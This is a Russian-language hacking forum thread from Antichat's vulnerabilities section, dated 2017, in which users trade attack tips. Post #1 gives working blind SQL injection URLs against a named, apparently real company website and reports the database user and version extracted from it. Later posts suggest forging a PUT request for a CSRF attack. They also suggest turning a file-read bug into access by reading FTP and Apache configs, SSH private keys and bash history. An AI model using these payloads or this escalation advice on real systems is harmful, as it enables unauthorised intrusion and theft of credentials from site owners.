HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.02.2017, 19:07
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами: 10143707

Репутация: 114
По умолчанию

Цитата:
Сообщение от Octavian  

В скулмап ктото засунет . интересно что он скажет
слепая скуля, потому вывода нет.

Код:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(user(),8,1)=%27t
Код:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(version(),7,1)=%27-
user() = iucosoft

version() = 5.5.40-(дальше не докрутил) в ручную подбирал с телефона
 
Ответить с цитированием

  #2  
Старый 05.02.2017, 20:15
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от Elva  

Задача
Подделать PUT запрос с целью проведения CSRF атаки.
Токен скорее всего проверяется, но всякое бывает. Для отправки PUT можно воспользоваться Burp-ом, для проведения атаки XMLHttpRequest.

Цитата:
Сообщение от Elva  

2. Кто может помочь включить BeEF ?
Попробуй подробно написать на гитхабе https://github.com/beefproject/beef/issues, возможно помогут.
 
Ответить с цитированием

  #3  
Старый 06.02.2017, 16:14
Nikolaz
Новичок
Регистрация: 17.11.2011
Сообщений: 0
С нами: 7624406

Репутация: -5
По умолчанию

Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
 
Ответить с цитированием

  #4  
Старый 06.02.2017, 17:32
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от Nikolaz  

Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?
Может у тебя локальный инклуд?
 
Ответить с цитированием

  #5  
Старый 06.02.2017, 19:38
Nikolaz
Новичок
Регистрация: 17.11.2011
Сообщений: 0
С нами: 7624406

Репутация: -5
По умолчанию

Цитата:
Сообщение от crlf  

Может у тебя локальный инклуд?
У меня file_get_contents() а не include() . Читать ток могу
 
Ответить с цитированием

  #6  
Старый 06.02.2017, 19:53
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от Nikolaz  

У меня file_get_contents() а не include() . Читать ток могу
тогда php файлы должны читаться, может прав не хватать, index.php например читается?
 
Ответить с цитированием

  #7  
Старый 06.02.2017, 20:15
Nikolaz
Новичок
Регистрация: 17.11.2011
Сообщений: 0
С нами: 7624406

Репутация: -5
По умолчанию

Цитата:
Сообщение от t0ma5  

тогда php файлы должны читаться, может прав не хватать, index.php например читается?
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
 
Ответить с цитированием

  #8  
Старый 06.02.2017, 20:23
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Nikolaz  

Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду
ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача
 
Ответить с цитированием

  #9  
Старый 06.02.2017, 20:25
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от Gorev  

ну для ssh пассы в открытом виде еще со времен мамонто не было, попробуй файлы конфигов фтп, апача
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
 
Ответить с цитированием

  #10  
Старый 06.02.2017, 20:42
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от t0ma5  

иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history
ну это крайне редкое исключение из правил, обычно из под www не большой выбор
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.